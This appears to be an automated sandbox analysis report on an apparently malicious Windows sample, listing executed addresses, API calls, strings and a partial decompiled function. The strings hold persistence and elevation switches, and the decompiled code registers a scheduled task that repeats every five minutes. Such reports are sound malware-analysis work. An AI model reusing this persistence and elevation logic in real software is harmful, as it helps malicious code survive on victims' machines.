0x0041a58b
0x0041a59b
0x0041a5a4
0x0041a5af
0x0041a5b2
0x0041a5b6
0x0041a5b8
0x0041a5bf
0x0041a5c7
0x0041a5cf
0x0041a5d6
0x0041a5db
0x0041a5de
0x0041a5e3
0x0041a5e9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5f1
0x0041a578
0x0041a5f5
0x0041a602
0x0041a6f9
0x0041a6f9
0x00000000
0x0041a608
0x0041a608
0x0041a60a
0x0041a702
0x0041a702
0x0041a709
0x00000000
0x0041a70f
0x0041a70f
0x0041a711
0x0041a717
0x0041a719
0x0041a72a
0x0041a72f
0x0041a733
0x0041a736
0x0041a741
0x0041a741
0x0041a743
0x0041a74e
0x0041a752
0x0041a752
0x0041a755
0x0041a758
0x0041a75e
0x0041a760
0x0041a763
0x0041a763
0x0041a765
0x0041a766
0x0041a766
0x0041a76a
0x0041a76a
0x0041a75a
0x0041a75a
0x0041a75a
0x0041a76c
0x0041a775
0x0041a77a
0x0041a77b
0x0041a77b
0x0041a784
0x0041a788
0x0041a78e
0x0041a790
0x0041a792
0x0041a797
0x0041a797
0x0041a7bb
0x0041a7c1
0x0041a7c9
0x0041a7ce
0x0041a7d4
0x0041a7d9
0x0041a7d9
0x0041a7ce
0x0041a719
0x0041a7e7
0x0041a7ec
0x0041a7ef
0x0041a7ef
0x0041a7f1
0x0041a7f1
0x0041a7f9
0x0041a803
0x0041a813
0x0041a819
0x0041a81e
0x0041a82f
0x0041a83b
0x0041a841
0x0041a842
0x0041a842
0x0041a852
0x0041a854
0x0041a85b
0x0041a87a
0x0041a886
0x0041a88c
0x0041a895
0x0041a89a
0x0041a89a
0x0041a8af
0x0041a8af
0x00000000
0x0041a610
0x0041a610
0x0041a612
0x00000000
0x0041a618
0x0041a618
0x0041a61e
0x0041a8b6
0x0041a8c5
0x0041a8ca
0x0041a8d5
0x0041a8da
0x0041a8de
0x0041a8e1
0x0041a8ec
0x0041a8ec
0x0041a8ee
0x0041a8f9
0x0041a901
0x0041a901
0x0041a904
0x0041a907
0x0041a90d
0x0041a90f
0x0041a912
0x0041a912
0x0041a914
0x0041a915
0x0041a915
0x0041a919
0x0041a919
0x0041a909
0x0041a909
0x0041a909
0x0041a91b
0x0041a924
0x0041a929
0x0041a92a
0x0041a92a
0x0041a92f
0x0041a932
0x0041a93a
0x0041a93c
0x0041a944
0x0041a94b
0x0041a952
0x0041a955
0x0041a95c
0x0041a962
0x0041a967
0x0041a967
0x0041a970
0x0041a970
0x0041a973
0x0041a976
0x0041a976
0x0041a97b
0x0041a97b
0x0041a97d
0x0041a95e
0x0041a95e
0x0041a95e
0x0041a97f
0x0041a987
0x0041a992
0x0041a997
0x0041a99a
0x0041a99e
0x0041a9a0
0x0041a9a0
0x0041a9a6
0x0041a9ab
0x0041a9b0
0x0041a9b4
0x0041a9ba
0x0041a9bf
0x0041a9bf
0x0041a9c6
0x0041a9cc
0x0041a9cf
0x0041a9d8
0x0041a9dd
0x0041a9df
0x0041a9e1
0x0041a9e8
0x0041a9ef
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa04
0x0041aa04
0x0041aa07
0x0041aa07
0x0041aa0a
0x0041aa0d
0x0041aa0d
0x0041aa12
0x0041aa12
0x0041aa14
0x0041a9fb
0x0041a9fb
0x0041a9fb
0x0041aa16
0x0041aa1e
0x0041aa29
0x0041aa2e
0x0041aa31
0x0041aa35
0x0041aa37
0x0041aa37
0x0041aa3e
0x0041aa44
0x0041aa49
0x0041aa4f
0x0041aa54
0x0041aa54
0x0041aa57
0x0041aa5f
0x0041aa65
0x0041aa6a
0x0041aa6a
0x0041aa70
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa76
0x0041aa7b
0x0041aa7b
0x0041aa7d
0x0041aa61
0x0041aa61
0x0041aa61
0x0041aa7f
0x0041aa8b
0x0041aa9b
0x0041aaa0
0x0041aaa4
0x0041aaa7
0x0041aab2
0x0041aab2
0x0041aab4
0x0041aabf
0x0041aac7
0x0041aac7
0x0041aaca
0x0041aacd
0x0041aad3
0x0041aad5
0x0041aad8
0x0041aad8
0x0041aada
0x0041aadb
0x0041aadb
0x0041aadf
0x0041aadf
0x0041aacf
0x0041aacf
0x0041aacf
0x0041aae1
0x0041aaea
0x0041aaef
0x0041aaf0
0x0041aaf0
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab07
0x0041ab0e
0x0041ab16
0x0041ab18
0x0041ab2c
0x0041ab2e
0x0041ab34
0x0041ab37
0x0041ab39
0x0041ab3b
0x0041ab3f
0x0041ab43
0x0041ab48
0x0041ab48
0x0041ab4d
0x0041ab54
0x0041ab5b
0x0041ab5e
0x0041ab62
0x0041ab7b
0x0041ab7d
0x0041ab64
0x0041ab67
0x0041ab67
0x0041ab68
0x0041ab6f
0x0041ab74
0x0041ab74
0x0041ab68
0x0041ab86
0x0041ab8c
0x0041ab8f
0x0041ab91
0x0041ab98
0x0041ab9f
0x0041ab9f
0x0041aba2
0x0041aba7
0x0041abad
0x0041abb2
0x0041abb2
0x0041abc0
0x0041abc5
0x0041abc9
0x0041abcc
0x0041abd7
0x0041abd7
0x0041abd9
0x0041abe4
0x0041abf0
0x0041abf0
0x0041abf3
0x0041abf6
0x0041abfc
0x0041abfe
0x0041ac01
0x0041ac01
0x0041ac03
0x0041ac04
0x0041ac04
0x0041ac08
0x0041ac08
0x0041abf8
0x0041abf8
0x0041abf8
0x0041ac0a
0x0041ac13
0x0041ac18
0x0041ac19
0x0041ac19
0x0041ac1e
0x0041ac28
0x0041ac2c
0x0041ac30
0x0041ac37
0x0041ac3f
0x0041ac41
0x0041ac55
0x0041ac57
0x0041ac5d
0x0041ac60
0x0041ac62
0x0041ac64
0x0041ac68
0x0041ac6c
0x0041ac71
0x0041ac71
0x0041ac76
0x0041ac7d
0x0041ac84
0x0041ac87
0x0041ac8b
0x0041aca4
0x0041aca6
0x0041ac8d
0x0041ac90
0x0041ac90
0x0041ac91
0x0041ac98
0x0041ac9d
0x0041ac9d
0x0041ac91
0x0041acaf
0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006DCCE8,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

F:\, xrefs: 0041B397
I:\5d2860c89d774.jpg, xrefs: 0041B32F
--Admin, xrefs: 0041A1B4, 0041A632
IsNotAutoStart, xrefs: 0041A645
list<T> too long, xrefs: 0041B669, 0041B673
%username%, xrefs: 0041B283
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
IsAutoStart, xrefs: 0041A1D0, 0041A273
x2Q, xrefs: 0041A856
runas, xrefs: 0041A6CE
x*P, xrefs: 0041ACE4
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
D:\Windows\, xrefs: 0041AFF3
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
7P, xrefs: 0041B164
--AutoStart, xrefs: 0041A2EC
X1P, xrefs: 0041A485
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
IsTask, xrefs: 0041A1EE, 0041A299
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files (x86)\Google\, xrefs: 0041B085
--Service, xrefs: 0041A30B
--Task, xrefs: 0041A2CD
C:\Program Files\Google\, xrefs: 0041AFB9
<, xrefs: 0041A67B
IsNotTask, xrefs: 0041A654
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
D:\Program Files\Google\, xrefs: 0041B0EE
--ForNetRes, xrefs: 0041A22E
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
C:\Windows\, xrefs: 0041AE0F

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 70b5b444aff160c4cda5a454501ebc16ad9a12550ae1cd8a62e69df6837b0e47
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 70b5b444aff160c4cda5a454501ebc16ad9a12550ae1cd8a62e69df6837b0e47
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				void* _t327;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4, 0);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff); // executed
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0"); // executed
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
